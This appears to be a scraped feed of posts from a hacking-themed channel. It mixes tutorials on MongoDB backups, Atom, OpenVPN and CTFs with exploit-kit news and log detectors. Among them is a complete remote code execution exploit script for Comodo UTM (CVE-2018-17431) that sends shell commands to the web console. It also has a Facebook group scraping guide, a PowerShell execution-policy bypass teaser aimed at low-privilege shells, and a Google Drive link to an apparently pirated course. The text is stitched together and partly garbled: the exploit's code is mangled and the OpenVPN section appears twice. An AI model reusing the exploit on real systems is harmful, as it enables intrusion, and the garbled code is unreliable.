▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Neptune exploit kit: how it works
Neptune exploit kit distributes Monero miner
Cybercriminals are using the Neptune exploit kit in a campaign that distributes a malicious miner, according to researchers at FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit because of similarities in the code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.
Neptune, however, has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including the URI patterns, landing pages, and malicious payloads.
The attackers use a legitimate pop-up ad service to spread the malware. They also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics a YouTube-to-MP3 converter.
Typically, malicious ads for this campaign are found on popular torrent sites. When a user lands on one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. Notably, none of the exploited vulnerabilities is new: all of them were disclosed back in 2014-2016.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
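The .com-to-.club swap described above can be hunted for in proxy or DNS logs. The following is an added example, not code from FireEye or from the original post; the allowlist, the small suffix table standing in for the Public Suffix List, and the log lines are constructed.

```python
from urllib.parse import urlsplit

# Sites the organisation actually uses; the domain pair comes from the post above.
KNOWN_GOOD = {"highspirittreks.com"}

# Assumption: a tiny stand-in for the Public Suffix List, enough for this demo.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}

# Constructed proxy log lines: "<timestamp> <client> <method> <url>".
SAMPLE_PROXY_LOG = """\
2020-09-10T10:01:02Z 10.0.0.15 GET http://highspirittreks.com/index.html
2020-09-10T10:01:09Z 10.0.0.15 GET http://highspirittreks.club/?zone=1
2020-09-10T10:02:44Z 10.0.0.22 GET http://cdn.highspirittreks.club/landing
2020-09-10T10:03:10Z 10.0.0.31 GET https://example.org/
"""


def split_registrable(host):
    """Split a hostname into (name, suffix), e.g. ('highspirittreks', 'club')."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    last_two = ".".join(labels[-2:])
    if len(labels) >= 3 and last_two in MULTI_LABEL_SUFFIXES:
        return labels[-3], last_two
    return labels[-2], labels[-1]


def find_tld_swaps(log_text, known_good=KNOWN_GOOD):
    """Return (client, host, impersonated_domain) for each lookalike request."""
    # Map each known-good name to the suffixes it is legitimately served under.
    good_suffixes = {}
    for domain in known_good:
        name, suffix = split_registrable(domain)
        good_suffixes.setdefault(name, set()).add(suffix)

    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line
        client, url = fields[1], fields[3]
        host = urlsplit(url).hostname
        parts = split_registrable(host) if host else None
        if parts is None:
            continue
        name, suffix = parts
        # Same registrable name as a known site, but under a TLD we do not expect.
        if name in good_suffixes and suffix not in good_suffixes[name]:
            impersonated = name + "." + sorted(good_suffixes[name])[0]
            hits.append((client, host, impersonated))
    return hits


if __name__ == "__main__":
    for client, host, impersonated in find_tld_swaps(SAMPLE_PROXY_LOG):
        print(f"{client} requested {host} (same name as {impersonated}, different TLD)")
```

A hit is a lead, not a verdict: organisations sometimes register their own name under several TLDs, so those belong in the allowlist.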
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Shell script for backing up a MongoDB database:
1) MongoDB is a cross-platform, document-oriented NoSQL database server.
2) In this tutorial, you will find a wrapper script for backing up a MongoDB database.
3) The script also deletes backups on the server that are older than the specified number of days.
You can copy this script:
#!/bin/bash
######################################################################
##
## MongoDB Database Backup Script
## Written By: Rahul Kumar
## Update on: June 20, 2020
##
######################################################################
export PATH=/bin:/usr/bin:/usr/local/bin
TODAY=$(date +"%d%b%Y")
######################################################################
######################################################################
DB_BACKUP_PATH='/backup/mongo'
MONGO_HOST='localhost'
MONGO_PORT='27017'
# If mongodb is protected with username password.
# Set AUTH_ENABLED to 1
# and add MONGO_USER and MONGO_PASSWD values correctly
# Note: a password passed with --password is visible in the process list
# while mongodump runs, so keep this file readable by its owner only.
AUTH_ENABLED=0
MONGO_USER=''
MONGO_PASSWD=''
# Set DATABASE_NAMES to "ALL" to backup all databases.
# or specify databases names separated with space to backup
# specific databases only.
DATABASE_NAMES='ALL'
# DATABASE_NAMES='mydb db2 newdb'
## Number of days to keep local backup copy
BACKUP_RETAIN_DAYS=30
######################################################################
######################################################################
mkdir -p "${DB_BACKUP_PATH}/${TODAY}"
AUTH_PARAM=""
if [ "${AUTH_ENABLED}" -eq 1 ]; then
    AUTH_PARAM="--username ${MONGO_USER} --password ${MONGO_PASSWD}"
fi
# ${AUTH_PARAM} is left unquoted below so that it splits into separate arguments.
if [ "${DATABASE_NAMES}" = "ALL" ]; then
    echo "You have chosen to back up all databases"
    mongodump --host "${MONGO_HOST}" --port "${MONGO_PORT}" ${AUTH_PARAM} --out "${DB_BACKUP_PATH}/${TODAY}/"
else
    echo "Running backup for selected databases"
    for DB_NAME in ${DATABASE_NAMES}
    do
        mongodump --host "${MONGO_HOST}" --port "${MONGO_PORT}" --db "${DB_NAME}" ${AUTH_PARAM} --out "${DB_BACKUP_PATH}/${TODAY}/"
    done
fi
######## Remove backups older than {BACKUP_RETAIN_DAYS} days ########
DBDELDATE=$(date +"%d%b%Y" --date="${BACKUP_RETAIN_DAYS} days ago")
if [ -n "${DB_BACKUP_PATH}" ]; then
    # Stop if the backup directory cannot be entered, so rm never runs elsewhere.
    cd "${DB_BACKUP_PATH}" || exit 1
    if [ -n "${DBDELDATE}" ] && [ -d "${DBDELDATE}" ]; then
        rm -rf "${DBDELDATE}"
    fi
fi
######################### End of script ##############################
4) MongoDB backup schedule
You can easily schedule this script in crontab for regular database backups.
0 2 * * * /backup/mongo-backup.sh
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Mind valley
Unlocking Transcendence with Jeffrey Allen
https://drive.google.com/folderview?id=1l2usYpm0ajOXZamHi7IJ3ZCAgleuCsKa
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
WTLAN | Five Key Considerations When Choosing Floor Standing Server Cabinets:
1) Server cabinet cooling systems
The choice of server cabinet will depend on the cooling system implemented in your data center and server room.
Hot Aisle Containment (HAC) and Cold Aisle Containment (CAC) systems are highly efficient air control processes that optimize the use of cold air by improving the flow of chilled air through aisles and server enclosures.
With electricity costs rising, energy planning is also an important factor to take into account; it may include reducing the amount of power used by the PDU and selecting racks with improved cabling and space for ventilation.
Follow the link to view the solutions from WTLAN - https://wtlan.ru/catalog/Napolnyeshkafy/
2) Power management
Power distribution units (PDUs) and battery backup are also important factors to consider when choosing a server cabinet and the number of outlets required.
Remote power tools such as smart power strips can help reduce server downtime, and reboot problems can be resolved from a remote location via internet access, whereas standard power strips can provide vital information and must be locally controlled.
3) Server cabinet size
Server cabinets and internal racks are available in a wide range of sizes up to 48U, in 19" and ETSI standards, in widths of 600 mm, 800 mm and 1000 mm, and in depths of 600 mm, 800 mm, 900 mm, 1000 mm and 1200 mm.
Key features and benefits may include: modular design, factory assembled, bay design (using a docking kit), hybrid design, thermal efficiency, hot and cold aisle isolation, robust locking solutions, a range of cable and accessory options.
4) Security
Companies are constantly looking for ways to improve their security solutions, and for a growing number of businesses security and protection, including protection against vandalism, are very important.
Floor-standing server cabinets can provide the following security options: fire protection and highly reliable locking solutions.
Additional measures include lockable front and rear doors, limiting the number of windows in a building, ensuring safe entrances and exits, and installing video surveillance.
5) Server cabinet design
Selecting the right server cabinets and racks and installing them according to your business needs will keep your IT equipment running reliably and efficiently and help improve power protection, cabling, and physical security.
When designing a server cabinet, consider: the height of the internal cabinet, width, depth, and rated load, cabinet layout, room characteristics, electrical equipment placement, cabling and environmental protection.
You can also choose from several cabinet options and accessories, including: cable trunking kit, chassis rail kit, shelves, top and side panels, mounting rails, heavy duty wheel kit, and paint color.
don't clone those written tutorials,or
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
New Categories & Speed improvement added to Undercodenews.com
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
How to Install Atom Text Editor on Kali Linux 2020.x?
Key features of the Atom text editor
-Cross-platform editing: works on Windows, Linux and macOS
-Has a built-in package manager: easily find and install packages to extend Atom capabilities.
-Smart AutoComplete: Write and edit code faster with smart and flexible autocomplete.
-File System Browser: Easily view and open a single file, an entire project, or multiple projects in one window.
-Highly Customizable: Customize the look and feel of your user interface with CSS / Less and add basic functionality with HTML and JavaScript.
-Provides Multiple Panels: Split the Atom interface into multiple panels for comparing and editing code between files
INSTALLATION & RUN :
Installing Atom Text Editor on Kali Linux
Add the official Atom package repository to your system by running the following command.
1) sudo apt update
2) sudo apt -y install wget gpg
3) sudo sh -c 'echo "deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main" > /etc/apt/sources.list.d/atom.list'
4) The repository content will be stored in a file:
$ cat /etc/apt/sources.list.d/atom.list
deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main
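5) Import the GPG key (note that apt-key is deprecated in newer Debian-based releases, and a key added this way is trusted for every configured repository, not only this one):
wget -qO - https://packagecloud.io/AtomEditor/atom/gpgkey | sudo apt-key add -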
6) Then update apt and install the Atom text editor on your Kali Linux machine:
sudo apt update
sudo apt install atom
7) Accept the installation prompt with the y key:
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
2020 update: dump information from any Facebook group:
INSTALLATION & RUN :
1) https://github.com/kevinzg/facebook-scraper
2) cd facebook-scraper
3) pip install facebook-scraper
4) Send the unique page name as the first parameter and you're good to go:
>>> from facebook_scraper import get_posts
>>> for post in get_posts('nintendo', pages=1):
...     print(post['text'][:50])
...
The final step on the road to the Super Smash Bros
We’re headed to PAX East 3/28-3/31 with new games
CLI usage
$ facebook-scraper --filename nintendo_page_posts.csv --pages 1 nintendo
Use
$ facebook-scraper --help
Optional parameters
group: group id, to scrape groups instead of pages. Default is None.
pages: how many pages of posts to request, usually the first page has 2 posts and the rest 4. Default is 10.
timeout: how many seconds to wait before timing out. Default is 5.
sleep: how many seconds to sleep between each request. Default is 0.
credentials: tuple of user and password to login before requesting the posts. Default is None.
extra_info: bool, if true the function will try to do an extra request to get the post reactions. Default is False.
youtube_dl: bool, use Youtube-DL for (high-quality) video extraction. You need to have youtube-dl installed on your environment. Default is False.
Post example
{'post_id': '2257188721032235',
 'text': 'Don’t let this diminutive version of the Hero of Time fool you, '
         'Young Link is just as heroic as his fully grown version! Young Link '
         'joins the Super Smash Bros. series of amiibo figures!',
 'time': datetime.datetime(2019, 4, 29, 12, 0, 1),
 'image': 'https://scontent.flim16-1.fna.fbcdn.net'
          '/v/t1.0-0/cp0/e15/q65/p320x320'
          '/58680860_2257182054366235_1985558733786185728_n.jpg'
          '?_nc_cat=1&_nc_ht=scontent.flim16-1.fna'
          '&oh=31b0ba32ec7886e95a5478c479ba1d38&oe=5D6CDEE4',
 'likes': 2036,
 'comments': 214,
 'shares': 0,
 'reactions': {'like': 135, 'love': 64, 'haha': 10, 'wow': 4, 'anger': 1},  # if extra_info was set
 'post_url': 'https://m.facebook.com/story.php'
             '?story_fbid=2257188721032235&id=119240841493711',
 'link': 'https://bit.ly/something'}
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
THIS IS THE LATEST COMODO EXPLOIT :
(patched now)
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8
import requests
def RndInt(Lenght):
from random import choice
from string import digits
RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)
if name == "main":
IP = input("IP: ")
Port = input("Port: ")
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''
BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart
try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)
SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
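For defenders, the request shape used by the PoC above is easy to find in web or proxy logs. The following is an added example, not part of the original PoC or post: it scans access-log lines for requests to /manage/webshell/u that carry a k parameter and reconstructs what was typed per source address. The combined log format, the addresses and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Path and parameter name are taken from the PoC shown on this page.
WEBSHELL_PATH = "/manage/webshell/u"
KEYSTROKE_PARAM = "k"

# Constructed sample in combined log format; addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Sep/2020:12:04:18 +0000] "GET /manage/webshell/u?s=4&w=120&h=37&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=12&_=1599739458000 HTTP/1.1" 200 512 "-" "python-requests/2.24.0"
198.51.100.7 - - [10/Sep/2020:12:04:19 +0000] "GET /manage/webshell/u?s=4&w=120&h=37&k=%0a&l=12&_=1599739458000 HTTP/1.1" 200 498 "-" "python-requests/2.24.0"
203.0.113.20 - - [10/Sep/2020:12:05:02 +0000] "GET /manage/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Sep/2020:12:05:09 +0000] "GET /manage/webshell/u?s=1&w=80&h=24 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan(log_text):
    """Group webshell keystroke requests by source and rebuild the typed lines."""
    events_by_src = defaultdict(list)
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not an access-log line we understand
        url = urlsplit(match["target"])
        if url.path != WEBSHELL_PATH:
            continue
        # parse_qs percent-decodes values, so %0a becomes a real newline.
        params = parse_qs(url.query, keep_blank_values=True)
        if KEYSTROKE_PARAM not in params:
            continue  # terminal polling without input, not a typed command
        events_by_src[match["src"]].append((match["ts"], params[KEYSTROKE_PARAM][0]))

    findings = []
    for src, events in events_by_src.items():
        typed = "".join(keys for _, keys in events)
        findings.append({
            "src": src,
            "first_seen": events[0][0],
            "requests": len(events),
            # Each newline ends one line entered into the console.
            "commands": [part for part in typed.split("\n") if part],
        })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['src']} sent {finding['requests']} keystroke request(s) "
              f"from {finding['first_seen']}: {finding['commands']}")
```

Administrators who use the web console legitimately produce the same requests, so compare the source addresses against known management hosts before escalating.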
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
What is Capture the Flag (CTF)?
#FastTips
-CTFs (capture the flag) are computer security/hacking competitions which generally consist of participants breaking, investigating, reverse engineering and doing anything they can to reach the end goal, a “flag” which is usually found as a string of text.
-DEF CON hosts what is the most widely known and first major CTF, occurring annually at the hacking conference in Las Vegas. Many different competitions have branched off since then, and numerous ones are available year round. One of the best places to see when CTFs are being scheduled is ctftime, an active website with calendars and team rankings.
wiki source
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
User safety is a thing of the past. The password can be picked in $25 and 12 minutes
#DataBreaches
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Finding a CTF:
If you ever wanted to start running, you were probably encouraged to sign up to a 5k to keep focused on a goal. The same principle applies here: pick a CTF in the near future that you want to compete in and come up with a practice schedule. Here are some CTFs that we can recommend:
1) PicoCTF and PlaidCTF by CMU
2) HSCTF is made for high school students
3) Ghost in the Shellcode (GitS)
4) CSAW CTF by NYU-Poly
5) UCSB iCTF is for academics only
6) Defcon CTF
#fastTips
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
PowerShell ExecutionPolicy Bypass.pdf
According to Microsoft, the execution policy is part of the security strategy of PowerShell. It determines whether you can load configuration files (including your PowerShell profile) and run scripts, and it determines which scripts, if any, must be digitally signed before they will run. It should be noted that Microsoft has gone on record saying that the ExecutionPolicy was never intended to be a security control.
In order to change the PowerShell execution policy, you have to start PowerShell as an administrator and run the command Set-ExecutionPolicy -ExecutionPolicy RemoteSigned. You can also set the policy to Unrestricted instead of RemoteSigned, but Microsoft discourages this.
Alright, but what if you are not an administrator yet? You have basic low privilege access to a Windows machine, and you need to upgrade your shell to something more stable, or to add some Empire persistence. How can you change the ExecutionPolicy?
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
How to install and connect OpenVPN client on Debian / Kali 2020 / Parrot?
1) Installing the OpenVPN Client
OpenVPN packages are available in the default Debian repositories.
2) Open a terminal on your Debian system and update the apt cache.
3) After that, install the OpenVPN package.
4) Open a terminal and run the commands to install the openvpn client on Debian:
sudo apt update
sudo apt install openvpn -y
5) Connect to OpenVPN Server
Copy the openvpn client config file to your Debian machine.
6) You can use the --config command line parameter to provide a configuration file.
7) The command will read all the necessary data to create a vpn from this file.
8) Let's run the following command to connect to the openvpn server:
openvpn --config client.ovpn
You should see the following output:
Thu Sep 10 12:04:18 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:18 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Thu Sep 10 12:04:18 2020 UDP link local: (not bound)
Thu Sep 10 12:04:18 2020 UDP link remote: [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:18 2020 TLS: Initial packet from [AF_INET]69.87.218.145:1194, sid=6d27e1cb 524bd8cd
Thu Sep 10 12:04:18 2020 VERIFY OK: depth=1, CN=Easy-RSA CA
Thu Sep 10 12:04:18 2020 VERIFY OK: depth=0, CN=tecadmin-server
Thu Sep 10 12:04:18 2020 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, 2048 bit RSA
Thu Sep 10 12:04:18 2020 [tecadmin-server] Peer Connection Initiated with [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:19 2020 SENT CONTROL [tecadmin-server]: 'PUSH_REQUEST' (status=1)
Thu Sep 10 12:04:19 2020 PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,route 10.8.0.1,topology net30,ping 20,ping-restart 60,ifconfig 10.8.0.6 10.8.0.5,peer-id 0,cipher AES-256-GCM'
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: timers and/or timeouts modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: --ifconfig/up options modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: route options modified
10) Check the connection
After a successful connection, a new IP address will be assigned on the tun0 interface by the OpenVPN server.
11) You can check it with the following command:
ip a show tun0
π¦Output:
tail -f /var/log/openvpn.log
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
How to install and connect the OpenVPN client on Debian, Kali 2020 and Parrot?
1) Installing the OpenVPN Client
OpenVPN packages are available in the default Debian repositories.
2) Open a terminal on your Debian system and update the apt cache.
3) After that, install the OpenVPN package.
4) Open a terminal and run the commands to install the openvpn client on Debian:
sudo apt update
sudo apt install openvpn -y
5) Connect to OpenVPN Server
Copy the openvpn client config file to your Debian machine.
6) You can use the --config command line parameter to provide a configuration file.
7) The command will read all the necessary data to create a VPN from this file.
8) Let's run the following command to connect to the openvpn server:
openvpn --config client.ovpn
9) You should see the following output:
Thu Sep 10 12:04:18 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:18 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Thu Sep 10 12:04:18 2020 UDP link local: (not bound)
Thu Sep 10 12:04:18 2020 UDP link remote: [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:18 2020 TLS: Initial packet from [AF_INET]69.87.218.145:1194, sid=6d27e1cb 524bd8cd
Thu Sep 10 12:04:18 2020 VERIFY OK: depth=1, CN=Easy-RSA CA
Thu Sep 10 12:04:18 2020 VERIFY OK: depth=0, CN=tecadmin-server
Thu Sep 10 12:04:18 2020 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, 2048 bit RSA
Thu Sep 10 12:04:18 2020 [tecadmin-server] Peer Connection Initiated with [AF_INET]69.87.218.145:1194
Thu Sep 10 12:04:19 2020 SENT CONTROL [tecadmin-server]: 'PUSH_REQUEST' (status=1)
Thu Sep 10 12:04:19 2020 PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,route 10.8.0.1,topology net30,ping 20,ping-restart 60,ifconfig 10.8.0.6 10.8.0.5,peer-id 0,cipher AES-256-GCM'
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: timers and/or timeouts modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: --ifconfig/up options modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: route options modified
10) Check the connection
After a successful connection, a new IP address will be assigned on the tun0 interface by the OpenVPN server.
11) You can check it with the following command:
ip a show tun0
Output:
4: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link/none
    inet 10.8.0.6 peer 10.8.0.5/32 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::7226:57b1:f101:313b/64 scope link stable-privacy
       valid_lft forever preferred_lft forever
12) The log file
You can also look at the OpenVPN server log to check the connection status:
tail -f /var/log/openvpn.log
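A post-connection check for the client log shown above, as an added example that is not part of the original post: it confirms the server certificate CN, the control-channel TLS version, and that the server pushed a default route and DNS resolvers. The function name, the expected CN example-server and the sample log are constructed for illustration, and treating a missing redirect-gateway as a failure assumes a full tunnel is intended.

```shell
#!/bin/sh
# Added example (not from the original post): audit an OpenVPN client log.
# Usage: audit_openvpn_log EXPECTED_CN < client.log
# Returns 0 only if every check passes. Tolerates "depth=0" and "depth = 0".
audit_openvpn_log() {
    expected_cn=$1
    log=$(cat)
    rc=0

    # 1. The server certificate (depth 0) must carry the CN we expect.
    cn=$(printf '%s\n' "$log" |
         sed -n 's/.*VERIFY OK: depth *= *0,.*CN *= *\([^,]*\).*/\1/p' | tail -n 1)
    if [ -n "$cn" ] && [ "$cn" = "$expected_cn" ]; then
        echo "OK   server CN is $cn"
    else
        echo "FAIL server CN is '${cn:-missing}', expected '$expected_cn'"; rc=1
    fi

    # 2. The control channel should negotiate TLS 1.2 or newer.
    tls=$(printf '%s\n' "$log" |
          sed -n 's/.*Control Channel: \(TLSv[0-9.]*\).*/\1/p' | tail -n 1)
    case $tls in
        TLSv1.2|TLSv1.3) echo "OK   control channel uses $tls" ;;
        *) echo "FAIL control channel uses '${tls:-unknown}'"; rc=1 ;;
    esac

    # 3. Inspect what the server pushed (assumption: a full tunnel is wanted).
    push=$(printf '%s\n' "$log" | grep 'PUSH_REPLY' | tail -n 1)
    case $push in
        *redirect-gateway*) echo "OK   default route goes through the VPN" ;;
        *) echo "FAIL no redirect-gateway pushed: split tunnel"; rc=1 ;;
    esac
    case $push in
        *"dhcp-option DNS"*) echo "OK   server pushed DNS resolvers" ;;
        *) echo "FAIL no DNS pushed: lookups stay on the local resolver"; rc=1 ;;
    esac
    return $rc
}

# Constructed sample log, modelled on the output format shown above.
SAMPLE_LOG="VERIFY OK: depth=1, CN=Example CA
VERIFY OK: depth=0, CN=example-server
Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, 2048 bit RSA
PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1,dhcp-option DNS 192.0.2.53,route 10.8.0.1,ifconfig 10.8.0.6 10.8.0.5'"

printf '%s\n' "$SAMPLE_LOG" | audit_openvpn_log example-server
```

On Linux the pushed DNS servers take effect only if the client config runs an up script such as update-resolv-conf, so a pass on the last check shows what the server offered, not what the resolver is using.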
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
18TB hard drive spring is here, Western Red Disk and Purple Disk are upgraded at the same time
#Technologies